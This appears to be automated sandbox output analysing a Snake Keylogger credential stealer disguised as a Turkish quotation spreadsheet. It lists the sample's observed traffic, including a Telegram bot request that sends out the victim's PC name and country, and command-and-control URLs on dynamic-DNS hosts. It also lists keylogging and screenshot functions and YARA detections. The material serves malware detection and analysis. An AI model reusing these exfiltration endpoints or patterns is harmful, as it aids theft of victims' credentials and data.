Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20and%20Time:%2027/09/2024%20/%2004:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216865%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 07:00:36 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 07:00:49 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4512207120.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4512203022.0000000000433000.00000040.00000400.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4512203022.0000000000433000.00000040.00000400.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4512207120.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092066185.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000A.00000002.2131580011.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4512203022.0000000000433000.00000040.00000400.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003129000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003046000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4512203022.0000000000435000.00000040.00000400.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003129000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003046000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003129000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003046000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003129000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003046000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20a
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003125000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003156000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003116000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003120000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBcq
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000031AF000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003116000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enx
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003102000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003092000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003129000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003024000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003046000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003092000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4512207120.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003102000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003129000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003024000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003046000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003156000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000031EA000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003151000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lBcq
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003147000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/x

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49752 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 0_2_02874B64	0_2_02874B64
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 0_2_0287DE4C	0_2_0287DE4C
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 0_2_06C14E80	0_2_06C14E80
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0167C146	9_2_0167C146
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_01677118	9_2_01677118
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0167A088	9_2_0167A088
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_01675362	9_2_01675362
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0167D278	9_2_0167D278
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0167C468	9_2_0167C468
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0167C738	9_2_0167C738
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_016769A0	9_2_016769A0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0167E988	9_2_0167E988
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_01673B8C	9_2_01673B8C
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0167CA08	9_2_0167CA08
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0167CCD8	9_2_0167CCD8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0167CFAA	9_2_0167CFAA
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0167F631	9_2_0167F631
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0167E97A	9_2_0167E97A
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_016729EC	9_2_016729EC
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_01673AA1	9_2_01673AA1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0167FA88	9_2_0167FA88
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_01673E09	9_2_01673E09
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B97D78	9_2_05B97D78
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B97720	9_2_05B97720
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B98B58	9_2_05B98B58
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9C598	9_2_05B9C598
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9E588	9_2_05B9E588
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9C588	9_2_05B9C588
